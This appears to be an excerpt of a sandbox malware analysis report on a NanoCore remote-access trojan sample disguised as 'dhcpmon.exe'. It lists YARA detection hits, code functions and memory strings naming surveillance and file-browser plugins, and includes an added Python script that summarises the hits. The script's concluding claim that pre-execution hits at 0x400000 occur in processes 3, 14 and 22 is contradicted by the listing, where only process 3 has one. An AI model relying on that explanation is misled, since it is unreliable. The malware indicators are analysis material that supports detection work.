        Source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.24fba7c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.24787c8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.24787c8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.258cc88.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.23fca20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.25cba7c.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.250cc3c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.341adf4.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.34111ef.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
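The list above is long because every unpacked region is reported twice (once as a rebuilt PE, once as `.raw`) and each region is hit by two rules. What an analyst actually wants from it is: which process images carry the payload, how many distinct regions per image, and whether any hit sits at the executable's image base in a dump taken before the process ran, since a payload that is already present at the entry point of a not-yet-executed process is the footprint of a process that was created suspended and overwritten. The script below is an added example, not part of the Joe Sandbox report. It reads the source identifier as `<proc>.<stage>.<image>.<hexaddr>.<n>[.raw].unpack`; treating the first field as the analysis process index and the second as the dump stage (1 before execution, 2 at the end of the run) is an assumption about the report format, as is 0x400000 as the image base. The function names are the example's own; the sample lines are modelled on the list above, one deliberately left in the fused form that HTML extraction produces.

```python
"""Summarise Joe Sandbox "Matched rule" hits on unpacked PE regions.

Added example, not part of the Joe Sandbox report.  Assumed identifier
layout:  <proc>.<stage>.<image>.<hexaddr>.<n>[.raw].unpack
  proc  - analysis process index (assumption)
  stage - 1 = dump before execution, 2 = dump at end of run (assumption)
"""
import re
from collections import defaultdict

# One report line.  Tolerates the separators HTML extraction drops between
# table cells ("UNPACKEDPEMatched rule: ... RAT Author: ...").
LINE_RE = re.compile(
    r"Source:\s*(?P<src>\S+?),\s*type:\s*(?P<type>[A-Z]+),?\s*"
    r"Matched rule:\s*(?P<rule>.+?),?\s+Author:\s*(?P<author>.+?)\s*$"
)

# The unpacked-region identifier.  The image name may itself contain dots,
# so the address/index/raw suffix is anchored from the right.
SRC_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+)\.(?P<addr>[0-9a-fA-F]+)"
    r"\.(?P<n>\d+)(?P<raw>\.raw)?\.unpack$"
)


def parse_hit(line):
    """Parse one report line; None if it is not a YARA hit on an UNPACKEDPE
    region (the later .sdmp MEMORY hits use a different layout and are skipped)."""
    m = LINE_RE.search(line)
    if not m or m.group("type") != "UNPACKEDPE":
        return None
    s = SRC_RE.match(m.group("src"))
    if not s:
        return None
    return {
        "proc": int(s.group("proc")),
        "stage": int(s.group("stage")),
        "image": s.group("image"),
        "addr": int(s.group("addr"), 16),
        "raw": s.group("raw") is not None,
        "rule": m.group("rule"),
        "author": m.group("author"),
    }


def summarise(lines):
    """Distinct (process, stage, address) regions per (image, rule).
    The .raw.unpack and .unpack dumps of one region count once."""
    regions = defaultdict(set)
    for line in lines:
        hit = parse_hit(line)
        if hit is not None:
            regions[(hit["image"], hit["rule"])].add(
                (hit["proc"], hit["stage"], hit["addr"]))
    return {key: len(v) for key, v in regions.items()}


def pre_execution_hits(lines, image_base=0x400000):
    """(proc, image) pairs whose stage-1 dump already matched at the image
    base, i.e. the payload was mapped at the entry point before the process
    ran.  0x400000 is the common 32-bit default and is assumed, not read
    from the report."""
    out = set()
    for line in lines:
        hit = parse_hit(line)
        if hit and hit["stage"] == 1 and hit["addr"] == image_base:
            out.add((hit["proc"], hit["image"]))
    return sorted(out)


# Sample lines modelled on the listing above; the sixth is kept in the fused
# form extraction produces, the last is a non-YARA line the parser must skip.
SAMPLE = [
    "Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth",
    "Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>",
    "Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>",
    "Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>",
    "Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>",
    "Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth",
    "Source: bGf2H3tXGg.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST",
]

if __name__ == "__main__":
    for (image, rule), count in sorted(summarise(SAMPLE).items()):
        print(f"{image:18} {rule:28} {count} region(s)")
    print("already at image base before execution:", pre_execution_hits(SAMPLE))
```

Fed the whole list above, `summarise` collapses it to a handful of rows per image and rule, and `pre_execution_hits` returns the stage-1 hits at 0x400000 for processes 3, 14 and 22, which is the set of process instances to pull memory from first.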
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 0_2_00403348 EntryPoint, SetErrorMode, GetVersion, lstrlenA, #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, OleUninitialize, ExitProcess, lstrcatA, lstrcatA, lstrcatA, lstrcmpiA, SetCurrentDirectoryA, DeleteFileA, CopyFileA, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 0_2_00406945
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 0_2_0040711C
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 3_2_0040A2A5
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 3_2_0225E471
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 3_2_0225E480
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 3_2_0225BBD4
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 3_1_0040A2A5
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_0040A2A5
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_007FE470
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_007FE480
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_007FBBD4
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_051BF5F8
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_051B9788
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_051BA5A2
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_051BA5E4
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_05273E30
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_05274A50
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_2_05274B08
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: 14_1_0040A2A5
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_0040A2A5
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_0254E470
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_0254E480
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_0254BBD4
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_051BF5F8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_051B9788
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_051BA5F8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_051BA610
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_05393E30
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_05394A50
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_05395330
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_2_05394B08
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 17_1_0040A2A5
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_2_0040A2A5
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_2_009EE480
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_2_009EE47C
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_2_009EBBD4
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_2_04FBF5F8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_2_04FB9788
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_2_04FBA5F8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_2_05253E30
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_2_05254A50
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_2_05254B08
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 22_1_0040A2A5
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: String function: 00401ED0 appears 92 times
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: String function: 004056B5 appears 32 times
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe, Code function: String function: 0040569E appears 72 times
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: String function: 00401ED0 appears 92 times
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: String function: 0040569E appears 72 times
Source: bGf2H3tXGg.exe, Static PE information: Resource name: RT_ICON, type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.3.dr, Static PE information: Resource name: RT_ICON, type: GLS_BINARY_LSB_FIRST
Source: bGf2H3tXGg.exe, 00000000.00000003.246102412.0000000002CAF000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameNAudio.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameClientPlugin.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameCoreClientPlugin.dll8 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs bGf2H3tXGg.exe
